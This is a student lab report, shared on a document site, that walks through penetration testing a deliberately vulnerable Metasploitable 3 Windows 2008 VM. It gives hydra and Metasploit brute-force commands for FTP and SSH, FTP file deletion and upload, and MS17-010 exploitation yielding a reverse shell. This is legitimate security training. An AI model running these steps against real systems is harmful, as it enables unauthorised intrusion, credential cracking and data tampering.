Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
Scribd Logo
Upload

Welcome to Scribd!

  • 41 views

    Lab Assignment 04

    Uploaded by

    Pradip Sarker
    Cyber Security4

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd

    Lab Assignment 04

    Uploaded by

    Pradip Sarker
    41 views17 pages
    Cyber Security4

    Original Title

    24525201005_Lab_Assignment_04

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Cyber Security4

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    41 views17 pages

    Lab Assignment 04

    Uploaded by

    Pradip Sarker
    Cyber Security4

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    You are on page 1of 17

    Bangladesh University of Professionals (BUP)

    M.Sc. in Cyber Security

    Course Code: MCS 1101


    Course Name: Cyber Security Fundamentals

    Lab Assignment No: 04

    Penetration Testing Windows 2008 Server Metastablevia a Different Port

    Submitted To: Submitted By:


    Engr. Md. Mushfiqur Rahman Sree Pradip Kumer Sarker
    ID No: 24525201005
    Guest Faculty, Dept of CE
    M.Sc. in Cyber Security
    Bangladesh University of Professionals (BUP)
    BUP, Dhaka, Bangladesh.
    Dhaka, Bangladesh.

    1
    Penetration Testing Windows 2008 Server Metastablevia a Different Port

    Today we are here to experiment in a lab where our target host will be a Metasploitable 3
    Windows 2008 server and our attacker will be Kali Linux. We are here going to scan the target
    host and see which ports are open and will try to penetrate the host on each portsand try to hack
    the target using a Kali machine as an attacker.

    At first we are going to open both machines . In the Kali we use netdiscover to findwhich IP’s
    are available in the network block :
    #netdiscover –r 192.168.100.0/24

    Via the search, we can see except attackers IP and both system and gateway IP, thereis another
    IP we discover which is the ip of the target machine.

    2
    So, the target machines ip here is 192.168.100.4.
    Now, we scan to find which ports are available and open in this host and their version .To do that
    we use nmap to enumerate:
    #nmap –sV 192.168.100.4
    Here –sV command gives the version of the open ports, so that it becomes easy for usto find
    payloads for that port to exploit.

    3
    21(ftp) port exploit:

    Here at first we see 21/tcp port is open. It is providing ftp service. Its version is Microsoftftpd.
    Lets try ftp to get into the ftp server of the target. To do that we just have to write ftp and give
    the Ip beside:

    #ftp 192.168.100.4

    Here we can see we can get into the ftp server but we were blocked by authentication process.
    To break this authentication process we can use hydra to crack the usernamepassword. To know
    what is hydra write on terminal :

    #whatis hydra

    For that we need a list of username in .txt file and also a list of password in .txt file. Wecan also
    use predefined user password list like rockyou.txt, for todays experiment we are going to use
    self-made username and password list.
    Now to use hydra to login crack we have to command :

    #hydra –L username.txt –P password.txt 192.168.100.4 ftp

    4
    By running a brute force logon cracking attack we got the user name password for ftpport to
    login .

    Here the username is : vagrantand


    password is : vagrant .

    Now we can login via ftp port to see what files the ftp server have :

    Now our login is successful with the username and password we got .
    Now if we check what file the server has , we need to check by using “ls” command.

    5
    Here are the file we have over the ftp server folder . now to put or get file from theserver
    we must change our scripting type by commanding binary:

    ftp>binary

    Here if we want to download welcome.png file we have write :


    ftp> get welcome.png

    This will download the file from remote server to local machine. These files will be savedfrom the
    directory which the terminal is working.

    6
    Here we can see welcome.png is here.

    So this is the directory file location where our files are saved. Obviously for the vulnerability of
    the target host we are getting these files. Now lets download another fileto check .

    7
    Now if we want to delete any file from there we just need to write delete along side withthe file
    name .

    Here we can the see the file was deleted successfully . With the ls command with all thefiles list ,
    there the welcome.png does not exist .
    Now if we want to upload or put a file again in the server like if we want to put the
    welcome.png file in the ftp server which was downloaded form there , simply we justhave to
    write put along with the file name beside .
    ftp> put welcome.png

    8
    22(SSH) port exploit:

    Here to get access via ssh port we need username and password for login via ssh. Nowwe are
    going to use crack user logon of ssh using metasploit .
    To start metasploit have to give command msfconsole :#msfconsole

    9
    Now we search for ssh_login payload for username password cracking .

    We found two payloads here , we are going to ssh_login which id is 0. Now wecommand
    use 0 , to use this payload.
    Msf6> use 0

    Now we set RHOSTs, set User list file and also set password list file. We also have toset
    stop_on_success true.
    Msf6>set RHOSTS 192.168.100.4
    Msf6>set user_file /home/kali/Desktop/username.txt
    Msf6>set pass_file /home/kali/Desktop/password.txt
    Msf6> set stop_on_success true

    10
    To see the setting we have to give command give show options command:msf6>show
    options

    Now to run the payload have to run command exploit:msf6>exploit

    Here the user name password matched and found :

    11
    Here the username : Vagrant and Password: Vagrant.

    Now here we can see we can log in via ssh.


    445(SMB) port exploit:

    This port is used for the Server Message Block sharing files between different operatingsystem
    i.e. Windows-Windows, Unix-Unix and Unix-windows. Server Message Block in modern
    language is also known as Common Internet File System.
    Here we will use nmap for the enumerations of the port 445 smb port to see if the port isopen or
    not, and also find system information.

    #nmap –p 445 –A 192.168.100.4

    12
    Here we can see via this scan we can get port state and version along with deviceinformation.
    NMAP has various script to scan vulnerability . Now we are going to scan with inbuiltscript for
    SMB vulnerability:
    #nmap --script smb-vuln* -p 445 192.168.100.4

    13
    In this scan we found vulnerability of the port 445 smb version of this target host. If wesearch
    its cve websites we can see the severity of this vulnerability.

    Here we can see the severity of this vulnerability is high. As result, it has shown thetarget
    machine is highly vulnerable to Ms17-010.
    Now let’s see how to exploit this vulnerability using Metasploit. To
    start the metasploit we have to give command : msfconsole.
    #msfconsole

    14
    Here we can search for the payload for vulnerable server ms17-010.msf6>
    search ms17-010

    Using first payload from the list to exploit this vulnerability.

    15
    We set rhosts 192.168.100.4 and give command to exploit. And it gives meterpeterreverse shell
    to control the target , it gives a gateway.

    Now using “windows/smb/ms17_010_psexec” to exploit this vulnerability

    16
    After configuring the payload we set the rhosts 192.168.100.4 and give command to
    exploit and it gives us the reverse shell of the target .

    17

    You might also like